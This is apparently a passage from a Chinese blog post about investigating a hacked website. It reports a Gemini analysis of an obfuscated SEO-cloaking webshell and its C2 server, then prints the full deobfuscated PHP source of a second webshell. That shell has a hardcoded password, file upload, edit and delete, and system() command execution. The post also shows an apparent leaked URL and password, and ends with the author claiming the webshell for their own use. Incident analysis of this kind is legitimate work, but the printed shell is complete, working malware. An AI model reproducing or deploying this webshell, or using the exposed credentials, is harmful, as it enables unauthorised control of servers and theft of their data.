    "remotePath": "/www/wwwroot/******.online",
    "uploadOnSave": true,
    "useTempFile": false,
    "openSsh": false,
    "ignore": [
        ".vscode",
        ".git",
        ".gitignore",
        "node_modules"
    ]
}

可是密码不正确,可能已经被修改。

https://bm.nhangiax.online/analysis.php
FuCK1231

现在来分析index.php头部的webshell,扔给gemini:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
1. 硬编码的核心字符串解析
脚本中隐藏了大量十六进制 (\x...) 和八进制 (\...) 编码的字符串,解码后的关键信息如下:
C2服务器地址 (远程控制端): http://cw4471.artistsaw.com/ (由 $iqxFs . $i0oQL . $TW_jg . $XhGp0 . $YwVDi 拼接而成)
存活测试/后门特征: tlctlc
本地特征文件: tlc.txt, sitemap.xml, robots.txt
关键URI路径: jp2023, favicon.ico, pingsitemap
目标搜索引擎特征: duckduckgo|google|aol|yahoo|bing
爬虫UA正则匹配: 包含了大量的爬虫特征,如 SeznamBot, Scrapy, Googlebot, YandexBot 等。

1. 核心逻辑分
这段脚本的主要行为是根据访问者的身份(IP、UA、Referer)和请求的URI,来决定是返回正常的404/403,还是从远程服务器拉取内容并展示。
存活检测后门 (极速拿分点):
代码中有一段逻辑:if (strpos($onzye, "tlctlc") !== false) { echo "ok"; exit; }
含义: 如果你请求的URI中包含 tlctlc(例如 /?a=tlctlc),服务器会直接返回 ok。这通常用于出题人验证后门是否存活,也可以作为你确认脚本正在运行的标志。
身份伪造 (Bypass 403/404):
如果你的 User-Agent 不是搜索引擎爬虫,或者 Referer 不包含搜索引擎的域名,脚本大概率会执行 goto fV5Np 或 goto i7Kcc,返回 403 Forbidden 或 404 Not Found。
含义: 要触发深层逻辑,你需要伪造 HTTP 头。将 User-Agent 修改为 Googlebot,或者将 Referer 设置为 https://www.google.com。
敏感文件操作:
脚本会检测本地是否存在 tlc.txt。如果不存在,它会创建并将 $vvypT 设为 0。它还会动态生成或修改 robots.txt 和包含 sitemap.xml 的内容。
SSRF/远程请求 (进阶利用):
当满足特定条件时(伪装成搜索引擎爬虫访问特定页面),脚本会拼接你的 IP、URI、UA 等信息,利用 curl 或 file_get_contents 向远端 http://cw4471.artistsaw.com/ 发起请求,并将获取到的内容回显给访问者。

那个ss.php就更复杂了,包含了权限维持、自身隐藏(其实目录下的.htaccess也是它创建的,我当时还很好奇一个nginx为啥会有这个)

12z.php是比较简单的webshell,base64+移位脱壳后如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
?><?php
error_reporting(0);
session_start();

// Password: memek123
$pass = "memek123";

// Cek login
if(isset($_GET['password'])) {
    if($_GET['password'] === $pass) {
        $_SESSION['login'] = true;
    }
}

// Jika belum login
if(!isset($_SESSION['login']) || $_SESSION['login'] !== true) {
    echo ' ';
    exit();
}

// WEBSHELL START
echo "<!DOCTYPE html>
<html>
<head>
    <title></title>
    <style>
        body { font-family: monospace; background-color: #f9f9f9; padding: 20px; }
        pre { font-size: 14px; }
        .cmd-section { margin-top: 20px; }
        .cmd-form { display: flex; gap: 10px; align-items: center; margin-bottom: 10px; }
        .cmd-form input[type='text'] { flex: 1; padding: 5px; font-family: monospace; font-size: 14px; }
        .cmd-form input[type='submit'] { padding: 5px 10px; }
        textarea { width: 100%; height: 200px; font-family: monospace; font-size: 14px; }
        a { text-decoration: none; color: #0645AD; }
        a.visited { color: #b58900 !important; font-weight: bold; }
        .logout { float: right; color: #e74c3c; font-weight: bold; }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            document.querySelectorAll('a').forEach(function(link) {
                if(localStorage.getItem(link.href)) {
                    link.classList.add('visited');
                }
                link.addEventListener('click', function() {
                    localStorage.setItem(link.href, '1');
                });
            });
        });
    </script>
</head>
<body>
<a class='logout' href='?logout=1'>Logout</a><pre>";

// Handle logout
if(isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit();
}

$cwd = realpath($_GET['path'] ?? getcwd());
if(!$cwd || !file_exists($cwd)) $cwd = getcwd();

// Handle delete
if(isset($_GET['del'])) {
    $target = realpath($_GET['del']);
    if(is_file($target)) {
        echo unlink($target) ? "[+] File deleted: $target\n" : "[-] Failed to delete file\n";
    } elseif(is_dir($target)) {
        echo rmdir($target) ? "[+] Directory deleted: $target\n" : "[-] Failed to delete directory\n";
    }
}

// Handle rename
if(isset($_GET['rename'], $_POST['newname'])) {
    $old = realpath($_GET['rename']);
    $new = dirname($old) . '/' . basename($_POST['newname']);
    echo rename($old, $new) ? "[+] Renamed to: $new\n" : "[-] Rename failed\n";
}

// Handle file save
if(isset($_GET['edit'], $_POST['content'])) {
    $file = $cwd . '/' . basename($_GET['edit']);
    echo file_put_contents($file, $_POST['content']) !== false ? "[+] File saved: $file\n" : "[-] Save failed\n";
}

// Handle file upload
if(isset($_POST["upload"]) && isset($_FILES["up"])) {
    $up = $_FILES["up"];
    $dest = $cwd . "/" . basename($up["name"]);
    echo move_uploaded_file($up["tmp_name"], $dest) ? "[+] Uploaded: " . $up["name"] . "\n" : "[-] Upload failed\n";
}

// Breadcrumb
echo "<b>Current Dir:</b> ";
$parts = explode("/", trim($cwd, "/"));
$build = "";
echo "<a href='?path=/'>/</a>";
foreach($parts as $part) {
    $build .= "/" . $part;
    echo "<a href='?path=" . urlencode($build) . "'>$part</a>/";
}
echo "\n\n";

// Directory listing
$files = scandir($cwd);
natcasesort($files);

$dirs = [];
$regularFiles = [];

foreach($files as $f) {
    if($f === "." || $f === "..") continue;
    $full = $cwd . '/' . $f;
    is_dir($full) ? $dirs[] = $f : $regularFiles[] = $f;
}

// Show directories
foreach($dirs as $f) {
    $full = $cwd . '/' . $f;
    echo "[DIR]  <a href='?path=" . urlencode($full) . "'>$f</a> ";
    echo "[ <a href='?del=" . urlencode($full) . "'>delete</a> | ";
    echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
}

// Show files
foreach($regularFiles as $f) {
    $full = $cwd . '/' . $f;
    echo "[FILE] <a href='?path=" . urlencode($cwd) . "&read=" . urlencode($f) . "'>$f</a> ";
    echo "[ <a href='?path=" . urlencode($cwd) . "&edit=" . urlencode($f) . "'>edit</a> | ";
    echo "<a href='?del=" . urlencode($full) . "'>delete</a> | ";
    echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
}

// File viewer
if(isset($_GET['read'])) {
    $target = realpath($cwd . '/' . $_GET['read']);
    if($target && is_file($target)) {
        echo "\n<b>Viewing:</b> " . htmlspecialchars($target) . "\n\n";
        echo htmlspecialchars(file_get_contents($target));
    }
}

// Edit form
if(isset($_GET['edit']) && !isset($_POST['content'])) {
    $file = $cwd . '/' . basename($_GET['edit']);
    $content = htmlspecialchars(@file_get_contents($file));
    echo "<form method='POST'>
    <textarea name='content'>$content</textarea><br>
    <input type='submit' value='Save'>
    </form>";
}

// Rename form
if(isset($_GET['rename']) && !isset($_POST['newname'])) {
    echo "<form method='POST'>
    Rename to: <input type='text' name='newname'>
    <input type='text' name='cmd'>
    <input type='submit' value='Exec'>
</form>";

if(!empty($_POST["cmd"])) {
    echo "<div>
        <b>CMD Output:</b><br>
        <textarea readonly>";
    system($_POST["cmd"]);
    echo "</textarea></div>";
}

echo "</div></pre></body></html>";
?>

好的现在这个马是我的了。